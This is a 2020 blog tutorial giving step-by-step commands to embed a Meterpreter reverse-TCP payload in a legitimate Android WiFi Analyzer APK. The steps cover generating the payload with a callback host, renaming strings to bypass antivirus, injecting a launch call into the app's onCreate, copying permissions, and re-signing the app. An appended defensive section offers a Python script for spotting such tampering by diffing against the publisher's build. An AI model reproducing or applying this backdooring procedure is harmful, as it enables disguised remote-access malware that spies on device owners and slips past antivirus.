Backdooring an Android APK with a Meterpreter Payload & AV Bypass

Saturday, October 31st, 2020 | Category: Android



This video demonstrates how it is possible to embed a Meterpreter payload in a valid Android APK so that the payload is launched with the app. Additionally, I’ve included a technique for bypassing some anti-virus software.

Here is basically what I did step by step:

Install Dependencies
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

1. Generate payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=443 -o rev_tcp_443.apk

2. Decompile APKs
apktool d -f rev_tcp_443.apk
apktool d -f wifi-analyzer.apk

3. Modify mentions of “metasploit” in /rev_tcp_443/smali/com/metasploit/stage/Payload.smali to be “totes-legit”
cd /rev_tcp_443/smali/com/metasploit/stage/
sed -i 's/metasploit/toteslegit/g' *

4. Copy payload files from /rev_tcp_443/smali/com/metasploit/stage/*
to
/com.wifi-analyzer/toteslegit/stage/

5. Edit WiFi Analyzer Manifest to locate Launcher smali
Locate android:name and action MAIN and LAUNCHER
WiFi Analyzer is at com.farproc.wifi.analyzer.MainScreen
-gedit MainScreen.smali
-Search for ;->onCreate(Landroid/os/Bundle;)V
-Insert the following line right after that line
invoke-static p0, Lcom/toteslegit/stage/Payload;->start(Landroid/content/Context;)V

6. Add the Meterpreter permissions
gedit the Android Manifest of the Met Payload; copy over to Wifi Analyzer

7. Recompile APK
apktool b wifi-analyzer

8. Create a key
keytool -genkey -v -keystore wifi-analyzer.keystore -alias wifi -keyalg RSA -keysize 2048 -validity 10000

9. Sign the APK with jarsigner
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/wifi-analyzer.keystore /root/Desktop/wifi-analyzer.apk wifi

The original instructions I followed can be found here: http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
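
From the defender's side, the string rename in step 3 only defeats name-based signatures; the edits from steps 5 and 6 remain visible when a suspect build is diffed against the publisher's reference build. The following is an added example (not from the video or its author): the function names and all sample manifests and smali are constructed for illustration, and both inputs are assumed to be apktool-decoded text.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
ONCREATE = re.compile(r"\.method[^\n]*onCreate\(Landroid/os/Bundle;\)V(.*?)\.end method", re.S)
CTX_CALL = re.compile(r"invoke-static(?:/range)? \{[^}]*\}, L([\w/$]+);->(\w+)\(Landroid/content/Context;\)V")

def permissions(manifest_xml):
    """Permission names requested by an apktool-decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

def context_calls(launcher_smali, app_package):
    """Static calls in onCreate that pass the Context to a class outside app_package."""
    prefix = app_package.replace(".", "/") + "/"
    return {f"{cls}.{name}" for body in ONCREATE.findall(launcher_smali)
            for cls, name in CTX_CALL.findall(body) if not cls.startswith(prefix)}

def triage(ref_manifest, ref_smali, new_manifest, new_smali, app_package):
    """Report what the candidate build has that the reference build lacks."""
    return {
        "added_permissions": sorted(permissions(new_manifest) - permissions(ref_manifest)),
        "added_calls": sorted(context_calls(new_smali, app_package)
                              - context_calls(ref_smali, app_package)),
    }

# Constructed sample input (not taken from any real APK).
MANIFEST = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android">'
            '{}</manifest>')
PERM = '<uses-permission android:name="android.permission.{}"/>'
REF_MANIFEST = MANIFEST.format(PERM.format("ACCESS_WIFI_STATE"))
NEW_MANIFEST = MANIFEST.format("".join(PERM.format(p) for p in
                               ("ACCESS_WIFI_STATE", "READ_SMS", "RECORD_AUDIO")))
SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
{}    invoke-super {{p0, p1}}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    return-void
.end method
"""
REF_SMALI = SMALI.format("")
NEW_SMALI = SMALI.format(
    "    invoke-static {p0}, Lcom/toteslegit/stage/Payload;->start(Landroid/content/Context;)V\n")

if __name__ == "__main__":
    print(triage(REF_MANIFEST, REF_SMALI, NEW_MANIFEST, NEW_SMALI, "com.farproc.wifi.analyzer"))
```

A static init call from a bundled SDK can also appear in added_calls after a legitimate update, so treat a hit as a triage signal. Because steps 8 and 9 sign with a newly generated key, the signing certificate of such a build will also differ from the publisher's.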


